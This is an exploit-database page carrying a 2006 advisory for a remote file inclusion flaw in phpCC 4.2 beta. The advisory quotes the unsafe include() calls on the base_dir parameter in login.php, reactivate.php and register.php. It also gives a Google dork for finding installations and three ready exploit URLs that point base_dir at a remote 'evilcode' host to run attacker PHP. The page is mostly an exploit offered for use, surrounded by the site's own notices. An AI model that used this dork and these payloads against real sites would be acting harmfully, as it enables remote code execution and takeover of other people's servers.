0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability
============================================================= phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability ============================================================= #############################SolpotCrew Community################################ # # phpCC - Beta 4.2 (base_dir) Remote File Inclusion # # Download file : http://www.phpcc.at/download_file1.html # ################################################################################# # # # Bug Found By :Solpot a.k.a (k. Hasibuan) (06-08-2006) # # ################################################################################ # # # Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid # robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa # home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet # Blue|spy , cah|gemblung , Slacky , blind_boy # and all member solpotcrew community @ http://solpotcrew.org/forum/ # # ############################################################################### Input passed to the "base_dir" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from login.php <?php define('PHPCC', true); define('SITE', 'login.php'); include($base_dir."includes/common.php"); include($base_dir."includes/header.php"); switch( $_GET['action'] ) code from reactivate.php define('PHPCC', true); include($base_dir."includes/config.php"); include($base_dir."includes/constants.php"); include($base_dir."includes/functions.php"); include($base_dir.'includes/sessions.php'); if( $_POST['submit'] == true ) code from register.php <?php define('PHPCC', true); define('SITE', 'register.php'); include( $base_dir . "includes/common.php" ); include( $base_dir . "includes/header.php" ); Google dork : "Powered by phpCC Beta 4.2" exploit : http://somehost/login.php?base_dir=http://evilcode http://somehost/reactivate.php?base_dir=http://evilcode http://somehost/register.php?base_dir=http://evilcode ##############################MY LOVE JUST FOR U RIE######################### ######################################E.O.F################################## # 0day.today [2024-11-16] #